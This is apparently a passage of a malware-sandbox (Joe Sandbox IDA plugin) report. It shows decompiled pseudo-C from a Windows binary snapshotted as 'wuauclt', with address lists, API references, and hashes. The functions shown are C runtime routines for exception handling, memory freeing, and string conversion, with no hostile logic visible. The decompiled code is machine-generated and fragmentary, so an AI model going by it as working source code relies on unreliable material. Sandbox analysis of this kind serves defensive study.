                                                																				_t231 = E00259852(_t253, _t264, _t282, _t289, _t304, __eflags);
                                                																				__eflags = _a32;
                                                																				_t267 = _v16;
                                                																				_push(_t304);
                                                																				 *((intOrPtr*)(_t231 + 0x14)) = _t267;
                                                																				if(_a32 != 0) {
                                                																					goto L64;
                                                																				} else {
                                                																					_push(_t253);
                                                																				}
                                                																				goto L65;
                                                																			}
                                                																		}
                                                																	} else {
                                                																		__eflags = _t289[8] & 0x00000004;
                                                																		if(__eflags == 0) {
                                                																			goto L60;
                                                																		} else {
                                                																			goto L52;
                                                																		}
                                                																	}
                                                																}
                                                															}
                                                														} else {
                                                															__eflags =  *((intOrPtr*)(_t304 + 0x14)) - 0x19930521;
                                                															if( *((intOrPtr*)(_t304 + 0x14)) == 0x19930521) {
                                                																goto L30;
                                                															} else {
                                                																__eflags =  *((intOrPtr*)(_t304 + 0x14)) - 0x19930522;
                                                																if( *((intOrPtr*)(_t304 + 0x14)) != 0x19930522) {
                                                																	goto L57;
                                                																} else {
                                                																	goto L30;
                                                																}
                                                															}
                                                														}
                                                													}
                                                												}
                                                											} else {
                                                												_v36 =  *((intOrPtr*)(E00259852(_t253, _t264, _t282, _t289, _t304, _t337) + 0x1c));
                                                												_t251 = E00259852(_t253, _t264, _t282, _t289, _t304, _t337);
                                                												_push(_v36);
                                                												_push(_t304);
                                                												 *(_t251 + 0x1c) =  *(_t251 + 0x1c) & 0x00000000;
                                                												L86();
                                                												if(_t251 != 0) {
                                                													goto L24;
                                                												} else {
                                                													_push(_v36);
                                                													L99();
                                                													_pop(_t264);
                                                													_t339 = _t251;
                                                													if(_t251 == 0) {
                                                														goto L62;
                                                													} else {
                                                													}
                                                													L63:
                                                													_push(1);
                                                													_push(_t304);
                                                													E002584A4();
                                                													_t267 =  &_v72;
                                                													E00258559(_t267);
                                                													E002595BC( &_v72, 0x26f95c);
                                                													L64:
                                                													_push(_a32);
                                                													L65:
                                                													E00259B63(_t267);
                                                													_push(_a16);
                                                													_push(_t253);
                                                													E00258FB5(_t253, _t267, _t282, _t289);
                                                													_t317 = _t316 + 0x10;
                                                													_push(_t289[7]);
                                                													_t198 = E0025872D(_t253, _t267, _t282, _t289, _t304, _t339);
                                                													asm("int3");
                                                													_t313 = _t317;
                                                													_push(_t267);
                                                													_push(_t267);
                                                													_push(_t289);
                                                													_t290 = _v80;
                                                													_t340 =  *_t290 - 0x80000003;
                                                													if( *_t290 == 0x80000003) {
                                                														L84:
                                                														return _t198;
                                                													} else {
                                                														_t199 = E00259852(_t253, _t267, _t282, _t290, _t304, _t340, _t304, _t253);
                                                														_t254 = _a16;
                                                														_t341 =  *((intOrPtr*)(_t199 + 8));
                                                														if( *((intOrPtr*)(_t199 + 8)) == 0) {
                                                															L72:
                                                															if( *((intOrPtr*)(_t254 + 0xc)) == 0) {
                                                																E0025D148(_t267, _t282, _t290);
                                                																asm("int3");
                                                																_push(_t313);
                                                																_t314 = _t317;
                                                																_t318 = _t317 - 0x18;
                                                																_push(_t254);
                                                																_push(_t304);
                                                																_t305 = _v100;
                                                																_push(_t290);
                                                																__eflags = _t305;
                                                																if(_t305 == 0) {
                                                																	E0025D148(_t267, _t282, _t290);
                                                																	asm("int3");
                                                																	_push(_t314);
                                                																	_push(_t254);
                                                																	_push(_t305);
                                                																	_push(_t290);
                                                																	_t292 = _v144;
                                                																	_t306 = 0;
                                                																	__eflags =  *_t292;
                                                																	if( *_t292 <= 0) {
                                                																		L103:
                                                																		_t202 = 0;
                                                																		__eflags = 0;
                                                																	} else {
                                                																		_t256 = 0;
                                                																		while(1) {
                                                																			_t206 = E0025967C( *((intOrPtr*)(_t256 + _t292[1] + 4)) + 4, 0x273504);
                                                																			__eflags = _t206;
                                                																			if(_t206 == 0) {
                                                																				break;
                                                																			}
                                                																			_t306 = _t306 + 1;
                                                																			_t256 = _t256 + 0x10;
                                                																			__eflags = _t306 -  *_t292;
                                                																			if(_t306 <  *_t292) {
                                                																				continue;
                                                																			} else {
                                                																				goto L103;
                                                																			}
                                                																			goto L104;
                                                																		}
                                                																		_t202 = 1;
                                                																	}
                                                																	L104:
                                                																	return _t202;
                                                																} else {
                                                																	_t294 =  *_t305;
                                                																	_t257 = 0;
                                                																	__eflags = _t294;
                                                																	if(_t294 > 0) {
                                                																		_t283 = 0;
                                                																		_v16 = 0;
                                                																		_t210 =  *((intOrPtr*)( *((intOrPtr*)(_v4 + 0x1c)) + 0xc));
                                                																		_t211 = _t210 + 4;
                                                																		__eflags = _t211;
                                                																		_v28 =  *_t210;
                                                																		_v36 = _t211;
                                                																		do {
                                                																			_t271 = _t211;
                                                																			_t212 = _v28;
                                                																			_v24 = _t211;
                                                																			_v20 = _t212;
                                                																			__eflags = _t212;
                                                																			if(_t212 > 0) {
                                                																				_t214 =  *((intOrPtr*)(_t305 + 4)) + _t283;
                                                																				__eflags = _t214;
                                                																				_v32 = _t214;
                                                																				while(1) {
                                                																					_t215 = E00259179(_t214,  *_t271,  *((intOrPtr*)(_v4 + 0x1c)));
                                                																					_t318 = _t318 + 0xc;
                                                																					__eflags = _t215;
                                                																					if(_t215 != 0) {
                                                																						break;
                                                																					}
                                                																					_t217 = _v20 - 1;
                                                																					_t271 = _v24 + 4;
                                                																					_v20 = _t217;
                                                																					__eflags = _t217;
                                                																					_v24 = _v24 + 4;
                                                																					_t214 = _v32;
                                                																					if(_t217 > 0) {
                                                																						continue;
                                                																					} else {
                                                																					}
                                                																					L95:
                                                																					_t283 = _v16;
                                                																					goto L96;
                                                																				}
                                                																				_t257 = 1;
                                                																				goto L95;
                                                																			}
                                                																			L96:
                                                																			_t211 = _v36;
                                                																			_t283 = _t283 + 0x10;
                                                																			_v16 = _t283;
                                                																			_t294 = _t294 - 1;
                                                																			__eflags = _t294;
                                                																		} while (_t294 != 0);
                                                																	}
                                                																	return _t257;
                                                																}
                                                															} else {
                                                																_t198 = E00259AB9(_t267, _t254, _a24, _a20,  &_v16,  &_v12);
                                                																_t273 = _v16;
                                                																_t319 = _t317 + 0x14;
                                                																_t285 = _v12;
                                                																if(_t273 < _t285) {
                                                																	_t137 =  &(_t198[3]); // 0xc
                                                																	_t310 = _t137;
                                                																	_t198 = _a20;
                                                																	do {
                                                																		if(_t198 >=  *((intOrPtr*)(_t310 - 0xc)) && _t198 <=  *((intOrPtr*)(_t310 - 8))) {
                                                																			_t221 =  *_t310 << 4;
                                                																			if( *((intOrPtr*)(_t310[1] + _t221 - 0xc)) == 0) {
                                                																				L79:
                                                																				_t222 = _t221 + _t310[1] + 0xfffffff0;
                                                																				_t300 = _v0;
                                                																				if(( *(_t221 + _t310[1] + 0xfffffff0) & 0x00000040) == 0) {
                                                																					_push(1);
                                                																					_t155 = _t310 - 0xc; // 0x0
                                                																					E00258767(_t254, _t285, _t300, _a4, _a8, _a12, _t254, _t222, 0, _t155, _a24, _a28);
                                                																					_t285 = _v12;
                                                																					_t319 = _t319 + 0x2c;
                                                																					_t273 = _v16;
                                                																				}
                                                																			} else {
                                                																				_t285 = _v12;
                                                																				_t254 = _a16;
                                                																				if( *((char*)( *((intOrPtr*)(_t310[1] + _t221 - 0xc)) + 8)) == 0) {
                                                																					goto L79;
                                                																				}
                                                																			}
                                                																			_t198 = _a20;
                                                																		}
                                                																		_t273 = _t273 + 1;
                                                																		_t310 =  &(_t310[5]);
                                                																		_v16 = _t273;
                                                																	} while (_t273 < _t285);
                                                																}
                                                																goto L83;
                                                															}
                                                														} else {
                                                															__imp__EncodePointer(0);
                                                															_t304 = _t199;
                                                															if( *((intOrPtr*)(E00259852(_t254, _t267, _t282, _t290, _t304, _t341) + 8)) == _t304 ||  *_t290 == 0xe0434f4d ||  *_t290 == 0xe0434352) {
                                                																goto L72;
                                                															} else {
                                                																_t198 = E002599DC(_t290, _a4, _a8, _a12, _t254, _a24, _a28);
                                                																_t317 = _t317 + 0x1c;
                                                																if(_t198 != 0) {
                                                																	L83:
                                                																	goto L84;
                                                																} else {
                                                																	goto L72;
                                                																}
                                                															}
                                                														}
                                                													}
                                                												}
                                                											}
                                                										} else {
                                                											_t336 =  *((intOrPtr*)(_t304 + 0x1c));
                                                											if( *((intOrPtr*)(_t304 + 0x1c)) == 0) {
                                                												goto L62;
                                                											} else {
                                                												goto L19;
                                                											}
                                                										}
                                                									}
                                                								}
                                                							}
                                                						}
                                                					}
                                                				}
                                                			}
















































































                                                0x00258928
                                                0x0025892b
                                                0x0025892c
                                                0x00258930
                                                0x00258939
                                                0x00000000
                                                0x0025893b
                                                0x0025893b
                                                0x0025893e
                                                0x00258943
                                                0x00258944
                                                0x00258946
                                                0x00000000
                                                0x00000000
                                                0x0025894c
                                                0x00258b4a
                                                0x00258b4a
                                                0x00258b4c
                                                0x00258b4d
                                                0x00258b54
                                                0x00258b57
                                                0x00258b65
                                                0x00258b6a
                                                0x00258b6a
                                                0x00258b6d
                                                0x00258b6d
                                                0x00258b75
                                                0x00258b78
                                                0x00258b79
                                                0x00258b7e
                                                0x00258b81
                                                0x00258b84
                                                0x00258b89
                                                0x00258b8b
                                                0x00258b8d
                                                0x00258b8e
                                                0x00258b8f
                                                0x00258b90
                                                0x00258b93
                                                0x00258b99
                                                0x00258c9a
                                                0x00258c9e
                                                0x00258b9f
                                                0x00258ba1
                                                0x00258ba6
                                                0x00258ba9
                                                0x00258bad
                                                0x00258bf4
                                                0x00258bf8
                                                0x00258c9f
                                                0x00258ca4
                                                0x00258ca5
                                                0x00258ca6
                                                0x00258ca8
                                                0x00258cab
                                                0x00258cac
                                                0x00258cad
                                                0x00258cb0
                                                0x00258cb1
                                                0x00258cb3
                                                0x00258d3b
                                                0x00258d40
                                                0x00258d41
                                                0x00258d44
                                                0x00258d45
                                                0x00258d46
                                                0x00258d47
                                                0x00258d4a
                                                0x00258d4c
                                                0x00258d4e
                                                0x00258d75
                                                0x00258d75
                                                0x00258d75
                                                0x00258d50
                                                0x00258d50
                                                0x00258d52
                                                0x00258d62
                                                0x00258d69
                                                0x00258d6b
                                                0x00000000
                                                0x00000000
                                                0x00258d6d
                                                0x00258d6e
                                                0x00258d71
                                                0x00258d73
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00258d73
                                                0x00258d7c
                                                0x00258d7c
                                                0x00258d77
                                                0x00258d7b
                                                0x00258cb9
                                                0x00258cb9
                                                0x00258cbb
                                                0x00258cbd
                                                0x00258cbf
                                                0x00258cc4
                                                0x00258cc6
                                                0x00258ccc
                                                0x00258cd1
                                                0x00258cd1
                                                0x00258cd4
                                                0x00258cd7
                                                0x00258cda
                                                0x00258cda
                                                0x00258cdc
                                                0x00258cdf
                                                0x00258ce2
                                                0x00258ce5
                                                0x00258ce7
                                                0x00258cec
                                                0x00258cec
                                                0x00258cee
                                                0x00258cf1
                                                0x00258cfa
                                                0x00258cff
                                                0x00258d02
                                                0x00258d04
                                                0x00000000
                                                0x00000000
                                                0x00258d0c
                                                0x00258d0d
                                                0x00258d10
                                                0x00258d13
                                                0x00258d15
                                                0x00258d18
                                                0x00258d1b
                                                0x00000000
                                                0x00000000
                                                0x00258d1d
                                                0x00258d21
                                                0x00258d21
                                                0x00000000
                                                0x00258d21
                                                0x00258d1f
                                                0x00000000
                                                0x00258d1f
                                                0x00258d24
                                                0x00258d24
                                                0x00258d27
                                                0x00258d2a
                                                0x00258d2d
                                                0x00258d2d
                                                0x00258d2d
                                                0x00258cda
                                                0x00258d3a
                                                0x00258d3a
                                                0x00258bfe
                                                0x00258c0d
                                                0x00258c12
                                                0x00258c15
                                                0x00258c18
                                                0x00258c1d
                                                0x00258c1f
                                                0x00258c1f
                                                0x00258c22
                                                0x00258c25
                                                0x00258c28
                                                0x00258c34
                                                0x00258c3d
                                                0x00258c52
                                                0x00258c58
                                                0x00258c5a
                                                0x00258c60
                                                0x00258c62
                                                0x00258c67
                                                0x00258c7c
                                                0x00258c81
                                                0x00258c84
                                                0x00258c87
                                                0x00258c87
                                                0x00258c3f
                                                0x00258c46
                                                0x00258c4d
                                                0x00258c50
                                                0x00000000
                                                0x00000000
                                                0x00258c50
                                                0x00258c8a
                                                0x00258c8a
                                                0x00258c8d
                                                0x00258c8e
                                                0x00258c91
                                                0x00258c94
                                                0x00258c25
                                                0x00000000
                                                0x00258c1d
                                                0x00258baf
                                                0x00258bb1
                                                0x00258bb7
                                                0x00258bc1
                                                0x00000000
                                                0x00258bd3
                                                0x00258be4
                                                0x00258be9
                                                0x00258bee
                                                0x00258c98
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00258bee
                                                0x00258bc1
                                                0x00258bad
                                                0x00258b99
                                                0x00258939
                                                0x00258903
                                                0x00258903
                                                0x00258907
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00258907
                                                0x002588e0
                                                0x002588d4
                                                0x002588b5
                                                0x002588a6
                                                0x0025887d
                                                0x00258873

                                                APIs
                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 00258930
                                                • _GetRangeOfTrysToCheck.LIBVCRUNTIME ref: 002589AB
                                                • ___TypeMatch.LIBVCRUNTIME ref: 00258A29
                                                • ___DestructExceptionObject.LIBVCRUNTIME ref: 00258AAB
                                                • IsInExceptionSpec.LIBVCRUNTIME ref: 00258ADC
                                                • FindHandlerForForeignException.LIBVCRUNTIME ref: 00258B2B
                                                • ___DestructExceptionObject.LIBVCRUNTIME ref: 00258B4D
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00258B65
                                                • _UnwindNestedFrames.LIBCMT ref: 00258B6D
                                                • ___FrameUnwindToState.LIBVCRUNTIME ref: 00258B79
                                                • CallUnexpected.LIBVCRUNTIME ref: 00258B84
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: Exception$DestructObjectSpecUnwind$CallCheckException@8FindForeignFrameFramesHandlerMatchNestedRangeStateThrowTrysTypeUnexpected
                                                • String ID: csm$csm$csm
                                                • API String ID: 410073093-393685449
                                                • Opcode ID: a6aabcbd047e106cae146ab88e525ad2973a962932316c9ee6c69381f96610a8
                                                • Instruction ID: 1ac75d5f46442f5fc583645d9684f8e3432ec73a9582396b862858b8e1d708f2
                                                • Opcode Fuzzy Hash: a6aabcbd047e106cae146ab88e525ad2973a962932316c9ee6c69381f96610a8
                                                • Instruction Fuzzy Hash: 61B19E7082020AEFCF24DF94C845AAEB7B5BF14316F144119EC1176251DBB1AAA9CFA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00260EF0(intOrPtr _a4) {
                                                				intOrPtr _v8;
                                                				intOrPtr _t25;
                                                				intOrPtr* _t26;
                                                				intOrPtr _t28;
                                                				intOrPtr* _t29;
                                                				intOrPtr* _t31;
                                                				intOrPtr* _t45;
                                                				intOrPtr* _t46;
                                                				intOrPtr* _t47;
                                                				intOrPtr* _t55;
                                                				intOrPtr* _t70;
                                                				intOrPtr _t74;
                                                
                                                				_t74 = _a4;
                                                				_t25 =  *((intOrPtr*)(_t74 + 0x88));
                                                				if(_t25 != 0 && _t25 != 0x272b18) {
                                                					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
                                                					if(_t45 != 0 &&  *_t45 == 0) {
                                                						_t46 =  *((intOrPtr*)(_t74 + 0x84));
                                                						if(_t46 != 0 &&  *_t46 == 0) {
                                                							E0025D2F4(_t46);
                                                							E00260AAF( *((intOrPtr*)(_t74 + 0x88)));
                                                						}
                                                						_t47 =  *((intOrPtr*)(_t74 + 0x80));
                                                						if(_t47 != 0 &&  *_t47 == 0) {
                                                							E0025D2F4(_t47);
                                                							E00260BAD( *((intOrPtr*)(_t74 + 0x88)));
                                                						}
                                                						E0025D2F4( *((intOrPtr*)(_t74 + 0x7c)));
                                                						E0025D2F4( *((intOrPtr*)(_t74 + 0x88)));
                                                					}
                                                				}
                                                				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
                                                				if(_t26 != 0 &&  *_t26 == 0) {
                                                					E0025D2F4( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
                                                					E0025D2F4( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
                                                					E0025D2F4( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
                                                					E0025D2F4( *((intOrPtr*)(_t74 + 0x8c)));
                                                				}
                                                				E00261063( *((intOrPtr*)(_t74 + 0x9c)));
                                                				_t28 = 6;
                                                				_t55 = _t74 + 0xa0;
                                                				_v8 = _t28;
                                                				_t70 = _t74 + 0x28;
                                                				do {
                                                					if( *((intOrPtr*)(_t70 - 8)) != 0x2725e8) {
                                                						_t31 =  *_t70;
                                                						if(_t31 != 0 &&  *_t31 == 0) {
                                                							E0025D2F4(_t31);
                                                							E0025D2F4( *_t55);
                                                						}
                                                						_t28 = _v8;
                                                					}
                                                					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
                                                						_t29 =  *((intOrPtr*)(_t70 - 4));
                                                						if(_t29 != 0 &&  *_t29 == 0) {
                                                							E0025D2F4(_t29);
                                                						}
                                                						_t28 = _v8;
                                                					}
                                                					_t55 = _t55 + 4;
                                                					_t70 = _t70 + 0x10;
                                                					_t28 = _t28 - 1;
                                                					_v8 = _t28;
                                                				} while (_t28 != 0);
                                                				return E0025D2F4(_t74);
                                                			}
















                                                APIs
                                                • ___free_lconv_mon.LIBCMT ref: 00260F34
                                                  • Part of subcall function 00260AAF: _free.LIBCMT ref: 00260ACC
                                                  • Part of subcall function 00260AAF: _free.LIBCMT ref: 00260ADE
                                                  • Part of subcall function 00260AAF: _free.LIBCMT ref: 00260AF0
                                                  • Part of subcall function 00260AAF: _free.LIBCMT ref: 00260B02
                                                  • Part of subcall function 00260AAF: _free.LIBCMT ref: 00260B14
                                                  • Part of subcall function 00260AAF: _free.LIBCMT ref: 00260B26
                                                  • Part of subcall function 00260AAF: _free.LIBCMT ref: 00260B38
                                                  • Part of subcall function 00260AAF: _free.LIBCMT ref: 00260B4A
                                                  • Part of subcall function 00260AAF: _free.LIBCMT ref: 00260B5C
                                                  • Part of subcall function 00260AAF: _free.LIBCMT ref: 00260B6E
                                                  • Part of subcall function 00260AAF: _free.LIBCMT ref: 00260B80
                                                  • Part of subcall function 00260AAF: _free.LIBCMT ref: 00260B92
                                                  • Part of subcall function 00260AAF: _free.LIBCMT ref: 00260BA4
                                                • _free.LIBCMT ref: 00260F29
                                                  • Part of subcall function 0025D2F4: HeapFree.KERNEL32(00000000,00000000,?,00260C44,?,00000000,?,00000000,?,00260C6B,?,00000007,?,?,00261088,?), ref: 0025D30A
                                                  • Part of subcall function 0025D2F4: GetLastError.KERNEL32(?,?,00260C44,?,00000000,?,00000000,?,00260C6B,?,00000007,?,?,00261088,?,?), ref: 0025D31C
                                                • _free.LIBCMT ref: 00260F4B
                                                • _free.LIBCMT ref: 00260F60
                                                • _free.LIBCMT ref: 00260F6B
                                                • _free.LIBCMT ref: 00260F8D
                                                • _free.LIBCMT ref: 00260FA0
                                                • _free.LIBCMT ref: 00260FAE
                                                • _free.LIBCMT ref: 00260FB9
                                                • _free.LIBCMT ref: 00260FF1
                                                • _free.LIBCMT ref: 00260FF8
                                                • _free.LIBCMT ref: 00261015
                                                • _free.LIBCMT ref: 0026102D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                • String ID: %'
                                                • API String ID: 161543041-2848518416
                                                • Opcode ID: f5cf7c12a1229a5bb1122af053d23d668abac150ce762b8f0bee52d9d3befb28
                                                • Instruction ID: c9c5533fc20ef2b63a92b32d3794356af94f28c6ea5a9b679304e926874fdc75
                                                • Opcode Fuzzy Hash: f5cf7c12a1229a5bb1122af053d23d668abac150ce762b8f0bee52d9d3befb28
                                                • Instruction Fuzzy Hash: FE315A316202029FEB31AE79D886B5B73E8AF00311F144829E898D7992DF75ECE5DF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0025E872(char _a4) {
                                                				char _v8;
                                                
                                                				_t26 = _a4;
                                                				_t52 =  *_a4;
                                                				if( *_a4 != 0x269f10) {
                                                					E0025D2F4(_t52);
                                                					_t26 = _a4;
                                                				}
                                                				E0025D2F4( *((intOrPtr*)(_t26 + 0x3c)));
                                                				E0025D2F4( *((intOrPtr*)(_a4 + 0x30)));
                                                				E0025D2F4( *((intOrPtr*)(_a4 + 0x34)));
                                                				E0025D2F4( *((intOrPtr*)(_a4 + 0x38)));
                                                				E0025D2F4( *((intOrPtr*)(_a4 + 0x28)));
                                                				E0025D2F4( *((intOrPtr*)(_a4 + 0x2c)));
                                                				E0025D2F4( *((intOrPtr*)(_a4 + 0x40)));
                                                				E0025D2F4( *((intOrPtr*)(_a4 + 0x44)));
                                                				E0025D2F4( *((intOrPtr*)(_a4 + 0x360)));
                                                				_v8 =  &_a4;
                                                				E0025E738(5,  &_v8);
                                                				_v8 =  &_a4;
                                                				return E0025E788(4,  &_v8);
                                                			}





                                                APIs
                                                • _free.LIBCMT ref: 0025E886
                                                  • Part of subcall function 0025D2F4: HeapFree.KERNEL32(00000000,00000000,?,00260C44,?,00000000,?,00000000,?,00260C6B,?,00000007,?,?,00261088,?), ref: 0025D30A
                                                  • Part of subcall function 0025D2F4: GetLastError.KERNEL32(?,?,00260C44,?,00000000,?,00000000,?,00260C6B,?,00000007,?,?,00261088,?,?), ref: 0025D31C
                                                • _free.LIBCMT ref: 0025E892
                                                • _free.LIBCMT ref: 0025E89D
                                                • _free.LIBCMT ref: 0025E8A8
                                                • _free.LIBCMT ref: 0025E8B3
                                                • _free.LIBCMT ref: 0025E8BE
                                                • _free.LIBCMT ref: 0025E8C9
                                                • _free.LIBCMT ref: 0025E8D4
                                                • _free.LIBCMT ref: 0025E8DF
                                                • _free.LIBCMT ref: 0025E8ED
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.680576375.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                • Associated: 00000000.00000002.680524455.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680612634.0000000000269000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680620343.0000000000271000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.680632582.0000000000274000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_250000_wuauclt.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: 909e7ca2422c73126a38e20ded1b46e40d98006a8bae74e0e052af3a6b8646ab
                                                • Instruction ID: 6d4e71cfb211b854c87947b8d822347ad783a7974cda4811e51d35be3c9ae584
                                                • Opcode Fuzzy Hash: 909e7ca2422c73126a38e20ded1b46e40d98006a8bae74e0e052af3a6b8646ab
                                                • Instruction Fuzzy Hash: 8511A476120189AFCF15EF98C842CD93BA5EF08351F4144A1BE088B222DB71DA69DF84
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 83%
                                                			E00265400(void* __ebx, void* __edi, int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, short* _a20, char* _a24, int _a28, int _a32) {
                                                				signed int _v8;
                                                				char _v22;
                                                				struct _cpinfo _v28;
                                                				short* _v32;
                                                				int _v36;
                                                				char* _v40;
                                                				int _v44;
                                                				intOrPtr _v48;
                                                				void* _v60;
                                                				void* __esi;
                                                				signed int _t63;
                                                				int _t70;
                                                				signed int _t72;
                                                				short* _t73;
                                                				signed int _t77;
                                                				short* _t87;
                                                				void* _t89;
                                                				void* _t92;
                                                				int _t99;
                                                				short _t101;
                                                				intOrPtr _t102;
                                                				signed int _t112;
                                                				char* _t114;
                                                				char* _t115;
                                                				void* _t120;
                                                				void* _t121;
                                                				intOrPtr _t122;
                                                				intOrPtr _t123;
                                                				intOrPtr* _t125;
                                                				short* _t126;
                                                				short* _t127;
                                                				signed int _t128;
                                                				short* _t129;
                                                
                                                				_t63 =  *0x271004; // 0x80aab37c
                                                				_v8 = _t63 ^ _t128;
                                                				_t127 = _a20;
                                                				_v44 = _a4;
                                                				_v48 = _a8;
                                                				_t67 = _a24;
                                                				_v40 = _a24;
                                                				_t125 = _a16;
                                                				_v36 = _t125;
                                                				if(_t127 <= 0) {
                                                					if(_t127 >= 0xffffffff) {
                                                						goto L2;
                                                					} else {
                                                						goto L5;
                                                					}
                                                				} else {
                                                					_t127 = E00264F92(_t125, _t127);
                                                					_t67 = _v40;
                                                					L2:
                                                					_t99 = _a28;
                                                					if(_t99 <= 0) {
                                                						if(_t99 < 0xffffffff) {
                                                							goto L5;
                                                						} else {
                                                							goto L7;
                                                						}
                                                					} else {
                                                						_t99 = E00264F92(_t67, _t99);
                                                						L7:
                                                						_t70 = _a32;
                                                						if(_t70 == 0) {
                                                							_t70 =  *( *_v44 + 8);
                                                							_a32 = _t70;
                                                						}
                                                						if(_t127 == 0 || _t99 == 0) {
                                                							if(_t127 != _t99) {
                                                								if(_t99 <= 1) {
                                                									if(_t127 <= 1) {
                                                										if(GetCPInfo(_t70,  &_v28) == 0) {
                                                											goto L5;
                                                										} else {
                                                											if(_t127 <= 0) {
                                                												if(_t99 <= 0) {
                                                													goto L36;
                                                												} else {
                                                													_t89 = 2;
                                                													if(_v28 >= _t89) {
                                                														_t114 =  &_v22;
                                                														if(_v22 != 0) {
                                                															_t127 = _v40;
                                                															while(1) {
                                                																_t122 =  *((intOrPtr*)(_t114 + 1));
                                                																if(_t122 == 0) {
                                                																	goto L15;
                                                																}
                                                																_t101 =  *_t127;
                                                																if(_t101 <  *_t114 || _t101 > _t122) {
                                                																	_t114 = _t114 + _t89;
                                                																	if( *_t114 != 0) {
                                                																		continue;
                                                																	} else {
                                                																		goto L15;
                                                																	}
                                                																}
                                                																goto L63;
                                                															}
                                                														}
                                                													}
                                                													goto L15;
                                                												}
                                                											} else {
                                                												_t92 = 2;
                                                												if(_v28 >= _t92) {
                                                													_t115 =  &_v22;
                                                													if(_v22 != 0) {
                                                														while(1) {
                                                															_t123 =  *((intOrPtr*)(_t115 + 1));
                                                															if(_t123 == 0) {
                                                																goto L17;
                                                															}
                                                															_t102 =  *_t125;
                                                															if(_t102 <  *_t115 || _t102 > _t123) {
                                                																_t115 = _t115 + _t92;
                                                																if( *_t115 != 0) {
                                                																	continue;
                                                																} else {
                                                																	goto L17;
                                                																}
                                                															}
                                                															goto L63;
                                                														}
                                                													}
                                                												}
                                                												goto L17;
                                                											}
                                                										}
                                                									} else {
                                                										L17:
                                                										_push(3);
                                                										goto L13;
                                                									}
                                                								} else {
                                                									L15:
                                                								}
                                                							} else {
                                                								_push(2);
                                                								L13:
                                                							}
                                                						} else {
                                                							L36:
                                                							_t126 = 0;
                                                							_t72 = MultiByteToWideChar(_a32, 9, _v36, _t127, 0, 0);
                                                							_v44 = _t72;
                                                							if(_t72 == 0) {
                                                								L5:
                                                							} else {
                                                								_t120 = _t72 + _t72;
                                                								asm("sbb eax, eax");
                                                								if((_t120 + 0x00000008 & _t72) == 0) {
                                                									_t73 = 0;
                                                									_v32 = 0;
                                                									goto L45;
                                                								} else {
                                                									asm("sbb eax, eax");
                                                									_t85 = _t72 & _t120 + 0x00000008;
                                                									_t112 = _t120 + 8;
                                                									if((_t72 & _t120 + 0x00000008) > 0x400) {
                                                										asm("sbb eax, eax");
                                                										_t87 = E0025D32E(_t112, _t85 & _t112);
                                                										_v32 = _t87;
                                                										if(_t87 == 0) {
                                                											goto L61;
                                                										} else {
                                                											 *_t87 = 0xdddd;
                                                											goto L43;
                                                										}
                                                									} else {
                                                										asm("sbb eax, eax");
                                                										E002676E0();
                                                										_t87 = _t129;
                                                										_v32 = _t87;
                                                										if(_t87 == 0) {
                                                											L61:
                                                											_t100 = _v32;
                                                										} else {
                                                											 *_t87 = 0xcccc;
                                                											L43:
                                                											_t73 =  &(_t87[4]);
                                                											_v32 = _t73;
                                                											L45:
                                                											if(_t73 == 0) {
                                                												goto L61;
                                                											} else {
                                                												_t127 = _a32;
                                                												if(MultiByteToWideChar(_t127, 1, _v36, _t127, _t73, _v44) == 0) {
                                                													goto L61;
                                                												} else {
                                                													_t77 = MultiByteToWideChar(_t127, 9, _v40, _t99, _t126, _t126);
                                                													_v36 = _t77;
                                                													if(_t77 == 0) {
                                                														goto L61;
                                                													} else {
                                                														_t121 = _t77 + _t77;
